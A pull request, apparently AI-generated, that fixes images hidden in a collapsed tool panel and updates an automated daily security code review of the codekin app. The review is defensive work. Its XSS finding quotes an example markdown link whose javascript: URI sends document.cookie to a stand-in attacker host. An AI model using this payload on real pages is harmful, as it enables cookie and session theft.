### PR TITLE
Fix images hidden inside collapsed tool activity

### DIFF
--- a/.codekin/reports/code-review/2026-03-09_code-review-daily.md
+++ b/.codekin/reports/code-review/2026-03-09_code-review-daily.md
@@ -1,116 +1,196 @@
 # Daily Code Review: codekin
 
-**Date**: 2026-03-09T05:02:13.749Z
-**Repository**: /home/dev/repos/codekin
-**Branch**: feat/workflow-list-larger-fonts
-**Workflow Run**: d939cce8-e32e-484f-a784-cf420545d8f8
-**Session**: 5e7bcfee-6707-4d22-8087-85407e4bf1af
+**Date**: 2026-03-09T15:05:00.147Z
+**Repository**: /srv/repos/codekin
+**Branch**: main
+**Workflow Run**: adc2e3ea-75ef-4b92-b458-e53ff599c834
+**Session**: 263f3ec0-78c8-4cc0-b356-5b550ade2ae1
 
 ---
 
-I'll start by gathering project structure, recent git history, and key files in parallel.Now let me do deeper reviews of critical areas in parallel.---
-
-# Codekin Code Review — 2026-03-09
-
-**Branch under review:** `feat/workflow-list-larger-fonts` (current) + `main` (last 7 days)  
-**Period:** March 2–9, 2026 | **Commits reviewed:** ~120+  
-**Test suite:** 32 files, 795 tests passing, 83.5% statement coverage
+Now let me verify the most critical findings directly before writing the report.I now have enough verified data to produce a complete, accurate review. Here is the daily automated code review:
 
 ---
 
-## Critical
+# Codekin — Daily Code Review (2026-03-09)
 
-### 1. Shell injection pattern in `workflow-loader.ts:208-209`
-Two `execSync` calls use shell-interpolated strings instead of `execFileSync` with argument arrays:
+## Activity Summary (Last 7 Days)
+
+Heavy UI work: mobile responsiveness, sidebar contrast fixes, docs browser, workflow enhancements, and a repo-health audit fix batch. No server-logic changes in the last 7 days. No CVEs in dependencies (`npm audit` clean on both packages).
+
+---
+
+## CRITICAL
+
+### C1 — Auth token exposed in all REST API URLs
+**File:** `src/lib/ccApi.ts` — lines 103, 136, 144, 153, 240, 247, 255, 263, 278, 292, 300, 308
+
+Every REST call appends the auth token as `?token=<value>`. Tokens in URLs are captured by browser history, nginx access logs, server process logs, and any HTTP proxy. The comment at line ~318 explicitly notes WebSocket avoids this, but the REST layer does not.
+
 ```typescript
-const branch = execSync('git rev-parse --abbrev-ref HEAD', { cwd: repoPath, ... })
-const lastCommit = execSync('git log -1 --oneline', { cwd: repoPath, ... })
+// Current (dangerous)
+await authFetch(`${BASE}/api/sessions/list?token=${encodeURIComponent(token)}`)
+
+// Fix: use Authorization header
+await authFetch(`${BASE}/api/sessions/list`, {
+  headers: { Authorization: `Bearer ${token}` }
+})
 ```
-While the commands are hardcoded, `repoPath` flows from user input. The rest of the file correctly uses `execFileSync` (line 213). **Fix: switch to `execFileSync` with array args.**
 
-### 2. SSRF gaps in `stepflow-handler.ts:427-441`
-Callback URL validation blocks IPv4 private ranges but misses:
-- IPv6 link-local (`fe80::/10`) and unique-local (`fc00::/7`) addresses
-- DNS rebinding attacks (no resolve-time validation)
-- `allowedCallbackHosts` can be empty, allowing any external URL
+This requires a corresponding change in `extractToken()` (`server/ws-server.ts:90`) to drop query-string extraction, which reduces the attack surface on the server side simultaneously.
 
-### 3. WebSocket auth fails open — `ws-server.ts:66-67`
+---
+
+### C2 — `javascript:` links not filtered in ChatView markdown
+**File:** `src/components/ChatView.tsx` — line 104
+
+`react-markdown` without `rehypeRaw` does escape raw HTML, so injecting `<script>` tags is not possible. However, `react-markdown` **does not** strip `javascript:` URIs from link `href` attributes by default. A Claude response containing:
+
+```markdown
+[Click me](javascript:fetch('https://attacker.com?c='+document.cookie))
+```
+
+...renders a live clickable XSS link. The existing `MarkdownRenderer.tsx` component (used elsewhere) already handles this with DOMPurify. ChatView should use the same protection.
+
+**Fix:** Add a custom `a` component override in `ChatView.tsx` to sanitize `href`:
+
 ```typescript
-function verifyToken(token: string | undefined): boolean {
-  if (!authToken) return true  // No auth configured → accept all
-  return token === authToken   // Not timing-safe
+a({ href, children, ...props }) {
+  const safeHref = href?.startsWith('javascript:') ? '#' : href
+  return <a href={safeHref} target="_blank" rel="noopener noreferrer" {...props}>{children}</a>
 }
 ```
-When no token is configured, all connections are accepted. Comparison is also vulnerable to timing attacks. **Fix: fail closed when no token is set; use `crypto.timingSafeEqual`.**
+
+Or reuse the existing `MarkdownRenderer` component.
 
 ---
 
-## Warning
+## WARNING
 
-### 4. Race condition in auto-join logic — `App.tsx:156-160`
-`autoJoinedRef` is set to `true` on first join but never reset when `activeSessionId` changes. Users navigating back to a previous session won't auto-rejoin.
+### W1 — Rate-limit map (`wsConnections`) never purged
+**File:** `server/ws-server.ts` — lines 307–319
 
-### 5. Upload failure silently drops files — `App.tsx:372-381`
-When `Promise.all()` rejects during file upload, pending files are cleared from state. The error toast only shows for 3 seconds. **Fix: preserve pending files on failure so users can retry.**
+The IP→connection-count map grows unboundedly. Expired entries are never cleaned. On a long-running server with many unique IPs (e.g., mobile users changing addresses), this leaks memory indefinitely.
 
-### 6. Settings API errors silently swallowed — `Settings.tsx:115,146`
+**Fix:** Add a periodic cleanup:
 ```typescript
-setSupportProvider(settings.token, provider).catch(() => {})
-setRetentionDaysApi(settings.token, days).catch(() => {})
+setInterval(() => {
+  const now = Date.now()
+  for (const [ip, entry] of wsConnections) {
+    if (now >= entry.resetAt) wsConnections.delete(ip)
+  }
+}, WS_RATE_WINDOW_MS)
 ```
-Users get no feedback when settings fail to save.
-
-### 7. Webhook signature not enforced at startup — `webhook-handler.ts:120-121`
-When `GITHUB_WEBHOOK_ENABLED=true` but `GITHUB_WEBHOOK_SECRET` is unset, the server logs a warning and continues. **Should exit with error to prevent unsigned webhook acceptance.**
-
-### 8. Path traversal edge case — `workflow-loader.ts:201-204`
-`resolve()` doesn't follow symlinks. A path like `/srv/repos-attacker/...` would pass the `startsWith(REPOS_ROOT)` check if REPOS_ROOT is `/srv/repos`. **Fix: use `realpathSync` and append `path.sep` to the prefix check.**
-
-### 9. Accessibility gaps — `LeftSidebar.tsx`
-- Icon-only buttons (theme toggle, logout) lack `aria-label`
-- Repo delete uses `<span onClick>` instead of `<button>` (line 548)
-- No keyboard accessibility for several interactive elements
-
-### 10. `workflow-loader.ts` has only 35% test coverage
-This is the lowest-covered file in the project and handles critical workflow discovery, MD parsing, and git operations.
 
 ---
 
-## Info
+### W2 — `checkAuthSession()` chains have no `.catch()` handler
+**File:** `src/hooks/useChatSocket.ts` — lines 494–503, 589–598
 
-### 11. Express 4.x is in maintenance mode
-`server/package.json` pins Express `^4.21.0`. Express 5 is available (5.2.1). Plan migration when convenient — coordinate with Multer 2.x upgrade (currently on legacy 1.4.5-lts).
+Both reconnection-path `.then()` chains lack `.catch()`. A network error inside `checkAuthSession` causes an unhandled promise rejection, silently swallowing the error and leaving the connection in an unknown state.
 
-### 12. ESLint exhaustive-deps disabled in 10+ locations
-Files: `App.tsx` (8 instances), `ChatView.tsx`, `LeftSidebar.tsx`, `WorkflowsView.tsx`. Most lack inline comments explaining why. This makes effect dependencies fragile and hides potential bugs.
+```typescript
+// Current
+checkAuthSession().then(valid => { ... })
 
-### 13. No component-level tests
-All 28 React components have 0% test coverage. Only hooks have tests. The 83.5% overall coverage is entirely from server + hook tests.
-
-### 14. Untested server routes
-`auth-routes.ts`, `session-routes.ts`, `upload-routes.ts`, `webhook-routes.ts`, `stepflow-handler.ts` — all HTTP route handlers lack test files. These are the primary attack surface.
-
-### 15. API keys passed via environment to child processes — `ws-server.ts:82-93`
-`GEMINI_API_KEY`, `OPENAI_API_KEY`, and other secrets are forwarded to Claude child processes via env vars. Acceptable for single-user deployment but would need secrets management for multi-tenant.
-
-### 16. Current branch change is low-risk
-The `feat/workflow-list-larger-fonts` branch modifies only `WorkflowsView.tsx` — 36 lines changed, all font-size class updates (e.g., `text-sm` → `text-base`). No logic changes, no new risks.
+// Fix
+checkAuthSession().then(valid => { ... }).catch(() => {
+  // treat transient network errors as retriable
+  reconnectTimer.current = setTimeout(connectRef.current, backoff.current)
+})
+```
 
 ---
 
-## Coverage Summary
+### W3 — Arbitrary file type accepted in screenshot upload
+**File:** `server/upload-routes.ts` — line 159 (multer config)
 
-| Area | Statement Coverage | Gaps |
-|------|-------------------|------|
-| Server (overall) | ~84% | `workflow-loader.ts` at 35%, `session-manager.ts` at 72% |
-| Frontend hooks | ~90% | `useTentativeQueue`, `useRepos`, `useWorkflows` untested |
-| Frontend components | **0%** | All 28 components untested |
-| Dependencies | 0 vulnerabilities | Express 4.x end-of-life, Multer legacy LTS |
+No `fileFilter` is set. Any file type (`.sh`, `.html`, `.svg`) can be uploaded. If uploaded files are ever served with their original MIME type, this is a stored XSS vector.
 
-## Top 5 Action Items
+**Fix:**
+```typescript
+fileFilter: (_req, file, cb) => {
+  const allowed = ['image/png', 'image/jpeg', 'image/gif', 'image/webp']
+  cb(null, allowed.includes(file.mimetype))
+}
+```
 
-1. **Fix shell injection** in `workflow-loader.ts:208-209` — switch `execSync` → `execFileSync`
-2. **Fix auth fail-open** in `ws-server.ts:66-67` — fail closed + timing-safe compare
-3. **Block IPv6 private ranges** in `stepflow-handler.ts` SSRF protection
-4. **Add tests for route handlers** — `auth-routes.ts`, `session-routes.ts`, `stepflow-handler.ts`
-5. **Increase `workflow-loader.ts` coverage** from 35% to at least 70%
+---
+
+### W4 — `requestId` from Claude process not validated before echoing
+**File:** `server/session-manager.ts` — lines 486–534
+
+`requestId` received from Claude's `control_request` event is stored and echoed back to the child process stdin without format validation. A malformed ID containing newlines or JSON metacharacters could corrupt the stdin stream.
+
+**Fix:** Validate format before use:
+```typescript
+if (!/^[\w-]{1,64}$/.test(requestId)) {
+  console.warn(`[control_request] Rejected invalid requestId: ${JSON.stringify(requestId)}`)
+  return
+}
+```
+
+---
+
+### W5 — Event listeners accumulate across Claude process restarts
+**File:** `server/session-manager.ts` — lines 391, 408–560
+
+Each call to `wireClaudeEvents()` attaches many `cp.on()` listeners to the new `ClaudeProcess` instance. When a session restarts (line 391), the prior process's listeners are not explicitly removed. Since `ClaudeProcess` extends `EventEmitter`, the old process object may stay alive in memory holding closures over `session` state.
+
+**Fix:** Call `cp.removeAllListeners()` (or store and remove specific listeners) when terminating the old process.
+
+---
+
+## INFO
+
+### I1 — Filename length not capped in upload handler
+**File:** `server/upload-routes.ts` — line 154
+
+`file.originalname` can be arbitrarily long. A 10MB filename would be an unusual attack but worth capping:
+```typescript
+const safe = file.originalname.slice(0, 64).replace(/[^a-zA-Z0-9._-]/g, '_')
+```
+
+### I2 — `/auth-verify` endpoint allows unauthenticated token probing
+**File:** `server/auth-routes.ts` — line 35
+
+`POST /auth-verify` returns `{ valid: true/false }` to any caller without rate limiting. This lets an attacker brute-force token validity. Low risk if tokens are long/random, but worth adding a basic rate limit middleware or a delay on negative responses.
+
+### I3 — DOMPurify hook registered globally in `MarkdownRenderer`
+**File:** `src/components/MarkdownRenderer.tsx` — line 59
+
+`DOMPurify.addHook()` modifies the global DOMPurify instance. If `MarkdownRenderer` is unmounted and remounted, duplicate hooks accumulate. Prefer `DOMPurify.sanitize(html, { ADD_ATTR: [...] })` options over hooks for idempotent configuration.
+
+### I4 — No pagination for WS history replay
+**File:** `server/ws-server.ts` — line 398
+
+`outputHistory.slice(-500)` is replayed to reconnecting clients. At large message sizes, this burst can stall slow connections. Consider a max-byte cap instead of max-count.
+
+### I5 — No test for mobile layout components
+Recent mobile-responsive PRs (#57, #59) added `MobileTopBar.tsx`, sidebar drawer logic, and `useIsMobile.ts`, but there are no component tests for these paths. Given responsive layout bugs were found in back-to-back PRs, snapshot or integration tests would catch regressions earlier.
+
+---
+
+## Summary Table
+
+| ID | Severity | File | Issue |
+|----|----------|------|-------|
+| C1 | **Critical** | `src/lib/ccApi.ts` | Auth tokens in URL query params (12 endpoints) |
+| C2 | **Critical** | `src/components/ChatView.tsx` | `javascript:` links not sanitized in markdown |
+| W1 | Warning | `server/ws-server.ts:307` | Rate-limit IP map never purged (memory leak) |
+| W2 | Warning | `src/hooks/useChatSocket.ts:494,589` | Missing `.catch()` on auth reconnect chains |
+| W3 | Warning | `server/upload-routes.ts:159` | No file-type filter on multer upload |
+| W4 | Warning | `server/session-manager.ts:486` | `requestId` not validated before stdin echo |
+| W5 | Warning | `server/session-manager.ts:391` | Event listeners accumulate on session restart |
+| I1 | Info | `server/upload-routes.ts:154` | Filename length uncapped |
+| I2 | Info | `server/auth-routes.ts:35` | `/auth-verify` unrate-limited, allows token probing |
+| I3 | Info | `src/components/MarkdownRenderer.tsx:59` | DOMPurify hook registered globally |
+| I4 | Info | `server/ws-server.ts:398` | History replay bounded by count, not byte size |
+| I5 | Info | — | No tests for mobile layout components |
+
+**Top recommended actions (priority order):**
+1. Switch all REST API calls from `?token=` to `Authorization: Bearer` headers (C1)
+2. Add `href` sanitization to ChatView's markdown `a` component (C2)
+3. Add multer `fileFilter` for image-only uploads (W3)
+4. Add `.catch()` to both reconnect `checkAuthSession` chains (W2)
+5. Add periodic `wsConnections` map cleanup (W1)

--- a/src/components/ChatView.tsx
+++ b/src/components/ChatView.tsx
@@ -250,11 +250,11 @@ function ToolActivity({ run, fontSize }: { run: ToolRun; fontSize: number }) {
           {run.outputs.map((o, oi) => (
             <ToolOutputInline key={`o-${oi}`} msg={o} fontSize={fontSize} />
           ))}
-          {run.images.map((img, ii) => (
-            <ImageInline key={`img-${ii}`} msg={img} />
-          ))}
         </div>
       )}
+      {run.images.map((img, ii) => (
+        <ImageInline key={`img-${ii}`} msg={img} />
+      ))}
     </div>
   )
 }


### PR DESCRIPTION
## Summary
- Images from tool results were rendered inside the collapsible tool activity panel
- Once tools finished running and the section auto-collapsed, images became invisible
- Moved image rendering outside the `{isOpen && (...)}` block so images are always visible regardless of collapse state

## Test plan
- [ ] Trigger a tool result that returns an image (e.g., Read an image file)
- [ ] Verify the image displays after tools finish and the tool activity section collapses
- [ ] Verify expanding the tool activity still shows tool details without duplicate images

🤖 Generated with [Claude Code](https://claude.com/claude-code)